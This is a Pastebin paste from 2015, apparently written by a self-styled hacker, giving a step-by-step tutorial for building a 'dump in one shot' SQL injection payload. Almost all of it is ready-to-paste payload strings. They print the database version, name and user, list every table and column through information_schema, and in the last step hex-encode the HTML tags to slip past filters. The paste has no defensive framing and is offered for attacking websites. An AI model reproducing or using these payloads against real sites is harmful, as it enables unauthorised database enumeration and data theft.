Advertisement
Kyfx

Easy and Simple Way to make DIOS

Oct 30th, 2015
269
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.44 KB | None | 0 0
  1. First We'll Print Our Cyber name
  2.  
  3. To use html tags we'll use them between apostrophes ( ' ) like '<p>Injected by D4RK 4NG31</p>'
  4.  
  5. And we'll use Concat function for multiple queries
  6.  
  7. So, Let's Start..
  8.  
  9. Concat('<h2>Injected by D4RK 4NG31</h2>') :D Done
  10.  
  11. Now For Print Version,Database,User .... We'll use these commands @@version,database(),user() and will use <br> for new line :)
  12.  
  13. Concat('<h2>Injected by D4RK 4NG31</h2>','<p>Version ::</p>',@@version,'<br>','<p>Database ::</p>',database(),'<br>','<p>User ::</p>',user(),'<br>')
  14.  
  15. Done :D we've printed all things now it's time to print tables and columns
  16.  
  17. Now for this we'll use this query
  18.  
  19. (select group_concat(column_name,'<br>',table_name) from information_schema.columns where table_schema=database())
  20.  
  21. Now add this query in DIOS
  22.  
  23. Concat('<h2>Injected by D4RK 4NG31</h2>','<p>Version ::</p>',@@version,'<br>','<p>Database ::</p>',database(),'<br>','<p>User ::</p>',user(),'<br>',(select group_concat(column_name,'<br>',table_name) from information_schema.columns where table_schema=database()))
  24.  
  25. HTML tags into hex :
  26.  
  27. Concat(0x3c68323e496e6a6563746564206279204434524b20344e4733313c2f68323e,0x3c703e56657273696f6e203a3a203c2f703e,@@version,0x3c62723e,0x3c703e4461746162617365203a3a3c2f703e,database(),0x3c62723e,0x3c703e55736572203a3a3c2f703e,user(),0x3c62723e,(select group_concat(column_name,0x3c62723e,table_name) from information_schema.columns where table_schema=database()))
  28.  
  29. DIOS completed
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement